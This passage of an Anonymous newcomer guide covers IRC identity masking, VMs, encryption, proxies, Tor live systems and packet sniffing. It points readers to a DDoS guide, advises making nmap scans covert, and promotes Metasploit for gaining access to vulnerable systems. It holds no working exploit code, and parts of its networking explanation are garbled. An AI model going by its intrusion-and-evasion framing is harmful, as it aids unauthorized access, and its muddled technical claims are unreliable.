The problem is that unless someone signs off in “an orderly fashion”, the server will not actually realize they are gone. Think of it like somebody who puts down a phone and walks away, but without hanging up the call. Or like when your computer crashes without shutting down the correct way. In these circumstances, the IRC server does not realize you’re gone, and assumes your nick is still connected. This situation remains until the next time the IRC pings your nick and gets no response (‘ping timeout’). This can take a while though, and very often the person who has disconnected, will manage to get themselves back online before the server has time to realize they ever left in the first place. When this happens, the user’s nick is already in use, so the server will assign them a new one (usually just by adding a ` or _ to the end, so if JohnDoe tries to connect when there is already a JohnDoe connected, they will be signed on as JohnDoe_ or JohnDoe`.
The problem with this, of course, is that just like an un-identified nick, these nicks have no modes, no vhosts, no access levels – because the “ghost” of the nick is still occupying them.
To force the dead session to disconnect and replace its nick with yours, type /msg nickserv GHOST password, where password is the pass to the original nick. This would, in this example, disconnect JohnDoe and change JohnDoe_ to JohnDoe automatically, identifying and setting up the nick as normal. When this happens, you will probably see something like this in the channel:
JohnDoe left the chat room (GHOST command used by JohnDoe_)
JohnDoe_ is now known as JohnDoe
It is very important to do this as quickly as possible when re-connecting, as you will be locked out of your vhost until you have done this.
Obviously one of the main priorities of any Anonymous is to be, well… Anonymous.
When you connect to our IRC server, the server will automatically mask your IP address (your computer’s “phone number”). This is the most important layer of anonymity, but unfortunately there is a catch. Most of the time, it will NOT automatically hide your ISP (Internet Service Provider)’s name. So for example the fact that your IP is from a certain town might be hidden, the fact that you are a comcast customer may not be.
To rectify this, we have a vHostServ. It gives you a fake host name, which masks the true ISP you are connecting through. It can be anything you want – for instance, if anyone ever tries to check where I am connecting from, they will see “fuck.off.you.bollocks” instead. :D
To get a vHost, you must be registered and identified. This is why it is CRUCIAL that you identify ASAP when you connect, as your vHost will not be activated until you have done so.
How to get a vHost :
1. Type /join #vhost in your IRC.
2. Once inside the vHost channel, type !vhost (insert.clever.name.here).
NOTE : You can, indeed, use whatever you want as a vhost – provided it is a valid one, i.e. no spaces, and must contain at least one dot. The most common way to do this therefore is.to.use.dots.as.spaces.in.your.vHost.
When you have done this, vHostServ will automatically kick and ban you from the #vhost channel. This is normal and expected, and simply means the vHost as worked. You will be banned from the channel (#vhost) for a certain amount of time, after which you will be able to change your vHost if you like. Now that you have a vhost, you are fully set up to use the IRC, any other settings you may set on your nick are purely optional.
*Note: If you join a #chan before you vHost, your new anonymized information will not automatically update in the channel. Be sure to exit and rejoin any channels you are connected to after you vHost, or your real connection information will still be viewable.
**NOTE: If you use Xchat along with auto-join channels, you can tell xchat to wait longer before joining channels on server connect using the /set irc_join_delay X command, where X is the number of seconds xchat will wait before joining channels. Setting this to something like 10 seconds helps if you’re using automatic channels
Invite-only channels (mode +i)
Some channels, for various reasons, are invite-only. Commonly this is because the channel has a very specific purpose and only users who have a specific job in the channel can access it – for example, there are private channels for operators and hackers. Sometimes, a channel will also be set to +i if it is being invaded or flooded by bots or trolls.
If a channel is +i, you will not be able to join it using /join. You will simply get an error message telling you that the channel is invite only. However, if you are an operator yourself, or are on the invite exception list, you can force the server to let you in.
To do this, you send a message to another bot called ChanServ, which is not covered in this guide as in general only more advanced users will ever need to use it. However, to request an invite, type /msg chanserv INVITE #channel, where #channel is the channel you are trying to connect to. It is important to include the # at the start of the channel name, or ChanServ won’t recognize it.
If you are on the list, you will then gert a message asking you if you would like to join the channel. Otherwise, chanserv will tell you that you do not have permission.
If you are NOT on the invite or operator list for a channel, but you feel you should be allowed in to it anyway, you can type /knock message, where message is your message to the channel admins. So for instance, if there was a channel called #brits only for British people, and you didn’t have access, you could type /knock #brits Hey, I’m British, let me in!
This will send a message to the channel admins, and cause your message to appear in the channel. The admins will then (if they decide to let you in), send you an invite just like chanserv does. You will receive the same message you would receive from chanserv asking you if you would like to join the channel.
NOTE: Knocking on a channel 10 times in a row is not going to amuse anyone. In all likelihood, it will actually make it almost certain that you will NOT be invited into the channel. If you receive no invite it either means the admins are not active at that time, or have decided for whatever reason not to invite you. If it does happen, you could maybe try again later, but don’t knock 10 times in one minute, this is more likely to get you banned.
If no one replies to your knock, another option you have is to type /msg chanserv INFO #channel, where #channel is the name of the channel (again, include the # or chanserv will ignore your message). This will tell you what the channel is for, and who created it. You could then message the room founder and ask for access, but this is generally not recommended unless it is extremely urgent.

Section 6: Advanced Defense Techniques
USING Virtual Machines
It is strongly recommend you consider making a Virtual Machine (VM) to seperate your personal OS instance with you anon activity OS instance. This ensures that personal data does not leak while viewing anon related social media on such sites as Twitter or Facebook.
It has several other advantages such as allowing you to quickly delete all anon activity off your computer by simply deleting the VM itself.
Virtual Machine Software
VirtualBox – x86 and x64
VMWare Workstation 7 – x86 and x64
Windows Virtual PC – x86
etc. (do a google search for “virtual machine)
Disk encryption is another way to protect yourself. Disk encryption software will make it pretty much impossible for any one but yourself to access the data on any physical disk.
Disk Encryption Software
TrueCrypt – http://www.truecrypt.org/
Bitlocker – (Win 7 Ultimate only)
File and Email encryption and validation (added by cred)
Using the openPGP standard, the following software creates a “Keyring” for you, bound to your name and email address (neither of which needs to be real, I have two, one for my real life identity and another as cred) The private key is a password protected key you keep on any system on which you will be DECRYPTING information; your home computer, and if you’re brave, your Android phone. The public key is used to ENCRYPT information or files, and is available to anyone. So if you wanted to encrypt information to send to me, you’d have to search from my public key, (cred@mail.i2p will find it for you) encrypt the data with it, and send it to me. The only thing that can now recover that data is my private key and password. PGP is the industry standard for high level encrypted email.
PGP (Windows) http://gpg4win.org/download.html
PGP (Linux) http://www.gnupg.org/
APG (Android) https://market.android.com/details?id=org.thialfihar.android.apg
- http://www.freeproxies.org
- http://www.socks24.org
- http://www.samair.ru/proxy
It’s possible to use Tor as a VPN using some prepackaged linux VM’s. Once these VM’s are started it’s possible to create a VPN connection to the Tor VM. These VM include additional privacy goodies such as Squid and Privoxy.
Linux Tor Software
JanusVM – http://janusvm.com/
TAILS – https://amnesia.boum.org/

Section 7: Portable Solutions

Portable refers to self-contained OS and software packages that can be run from CD, DVD or USB device. This allows you to carry your anon OS instance in your pocket, plug it into or insert into another computer and be ready to access anon resources in a secure way.
The Amnesic Incognito Live System: https://amnesia.boum.org/download/index.en.html
A bootable, live, Linux distribution focusing on security and privacy, Basically this entire document in a single download.
Gnacktrack: http://www.gnacktrack.co.uk/
For the hacker anons among us, a live linux distribution with all the tools a good hacker needs to control the fate of the world from a laptop at a Starbucks.
BackTrack: http://www.backtrack-linux.org/
Gnacktrack, only for people who prefer the K desktop environment over GNOME.
Ubuntu Privacy Remix: https://www.privacy-cd.org/
Intended solely for Live Booting, no installation on the local system is required, and none of the data on it is touched.


by Denizen
Preface: Information in this section can be extremely confusing for new users, and those without the sufficient technical knowledge to understand. Always be cautious when tinkering with systems you don’t fully understand, as this may lead to undesirable results, detection, and in extreme cases system failure or legal trouble.
For those interested, an excellent guide to Denial of Service Attacks or DDoS can be found here: http://insurgen.cc/index.php?title=DDOS
Guide By: Denizen
As the ultimate denizen, you must be able to enter systems at will in various ways. There are many ways to reach a website, and to add protection for yourself in terms of anonimity and minimized vulnerability.
Table of Contents
1. SSH Tunnelling Techniques
2. VPN (Virtual Private Network) Sub-netting techniques
3. Anonymous SOCKS4/SOCKS5 proxy techniques at
OS level (e.g. Network Layer 3)
4. Anonymous SOCKS4/SOCKS5 proxy techniques at Internet Browser Level (e.g. firefox)
5. Local DNS hosting and Direct to IP internet browsing
6. Windows /system32/drivers/etc/Hosts File IP DNS Lookup (Associating any ip with any hostname, permanently)
Normal connections to the internet, unless using SSL, are typically unencrypted transmissions divided into data packets. Using a packetsniffer, it is possible to capture most packets, and look at their payload in plain text. This can include usernames, emails, IM’s, and sometimes even passwords and sensitive information. When you set up a tunnel securely, you are connecting to a secure, encrypted connection to the machine you are connecting to, helping to prevent the use of packetsniffers to steal your information.
Not only is this useful for keeping your local connection to the internet secure, it is also one of the basic ways you can hide which IP address you are connecting to the internet from at home. When using the tunnel for your transmissions, all of your packets will have that machine’s IP address on the source address section instead of your own. Again, as covered above, you cannot trust a VPN (SSH) provided at no cost. It is in your best interests to use a paid hosting provider.
2.OPENVPN GNU/LINUX HOWTO (what if they don’t have linux) list alternatives for vpn/ instructions for other os’s?)
Information on how to set up a GNU/Linux system to use open VPN can be found here: http://openvpn.net/howto.html (openvpn only secures you between your server and you, not between your server and the internet. your server will be the middle man and is identifieable unless augmented with additional obfuscation techniques)
If you’re interested in using SOCKS 4/5 proxies with the Firefox browser, you can find instructions here: http://uniqueinternetservices.com/configure-proxy-for-firefox.html
This section explains how to change the nameserver that resolves domain names into IP adresses that is sometimes used as an ideal way to trace you by your ISP, even if the data you used is encrypted via RSA or a strong triple des encryption the request to the domain name to an ip still is carried out by someone, make sure it’s you, or someone friendly.
DNS requests in an ideal situation should be encrypted, if you’re super paranoid, and some proxies offer this. I can’t list which ones off the top of my head, sorry.
http://dnscurve.org/in-benefits.html ?
This hackers trick is a good way to associate a permanent IP mirror for your favourite social networking site like facebook, twitter, etc etc. If this is something you’re interested in, more information can be found here: http://www.ehow.com/how_5225562_edit-windows-hosts-file.html
If you want cannabis.com to goto then you can enter it just like the
localhost entry you’ll find in your windows setup. This bypasses nameserver requests to most browsers (check to be sure with a packet sniffer)
All of these need PCap drivers installed and are included in the downloads of each…
Understanding packets takes time and practice. To get started install a copy of wireshark (http://www.wireshark.org/); or MS Network Monitor 3.4, both are free. If you don’t see any capture interfaces listed then you may need to run it as administrator. To identify which interface is seeing your traffic click the first (top-left) icon “list available interfaces” and look for the one with the numbers counting up; it’s the active one. Start it and watch all the packets flow. You might see lots of traffic, start closing shit that’s downloading or streaming stuff. You’ll get down to a slower scroll of ARP and NetBios traffic, the occasional UPNP burst and other stuff. If you’re on a secure VPN or something you’ll see just about ALL SSL/TLS grey colored packets or all UDP blue packets in some cases. Try another active interface (like a TAP interface) to see the goods. Get on your home network and play around; see what DHCP handshakes look like, DNS requests/responses, navigate a shared folder and see what it shows you, stuff like that. If you know how, do an nmap scan and see how obvious and loud it is and learn techniques to use it in a more covert manner.
http://www.wireshark.org/docs/ <- read and watch the videos. There’s a lot to it but once you catch on it’s quite simple to grasp.
TCPDump(linux)/WinDump(windows) – Command line packet capture for gathering to analyze later. http://www.tcpdump.org/ and http://www.winpcap.org/windump/
NetworkMiner (http://networkminer.sourceforge.net/) is an alternative that allows you to sort collected packets however you want (by host for example) for easy digging around.
(DNS/HTTP Port 80/Logging/Secure ways to connect to your ‘crack’ machine).. PROXY CHAINING, SSH CLI Chaining maybe?
  • Change DNS Settings in Windows XP
Network Layers & OSI Model
In order for a security expert to truly understand a software or hardwares running on a network or security system, they must be able to relate to and fully conceive the implications of changes that are made to an existing setup.
No matter what you do at any level of the network layer, you will be interacting at other levels also. E.g. The data link layer (Layer 2 OSI) must make use of the physical layer (Layer 1 OSI), and so on.
Layer 1 : Physical layer
This is the electrical and physical specification of the devices. In particular it will refer to pins, voltages, repeaters, hubs, network adapters, host bus adapters and SANs (Storage Area NEtworks). Standards such as the RS-232C Com port standard popularised in the 90′s uses such physical wires to access medium.
One such popular medium would be the internet. To which the early modems connected.
Layer 2 : Data Link Layer
The Data Link Layer provides functional and procedural means to transfer data between network entities using physical layers (or cabling/adapters/routers/repeaters) so on and so forth. Originally Layer 2 was intended for point 2 point transfer only. LAN and multi-broadcast media (multicast et al) were developed independant of the ISO standard (IEEE 802).
WAN and LAN are services on the data link layer that arrange bits, from physical layer into logical fram sequences.
These frames contain important information that is relative to your Transmission Control Protocol, and includes information such as your IP (Internet Protocol) address.
This address is binded through service levels by the TCP (Transmission Control Protocol) transport layer.
8. Hack in a sack:
The Metasploit Framework
Metasploit is a software suite created for penetration testing, and is included in both Backtrack and Gnacktrack LiveCDs listed in the mobile solutions section. It has a command line interface, a GUI interface, and a Web interface, creating what is, in a real way, the world’s first point-and-click hacking software. It has a massive, constantly updated Database of usable exploits, which you can use to gain access to vulnerable remote systems. http://www.metasploit.com/
Sign off
Thanks for reading this whole doc, you did right? Please ask questions in #OpNewblood (Again, you can reach us via your web browser at http://goo.gl/8zxwO) and refer back to this document and remember to stay safe. Protecting your anonmity is the most important part of being Anonymous.
In our world a good defense is the best offense.
Thanks to all of Indonesian people & keep roll in http://www.binushacker.net friends :)

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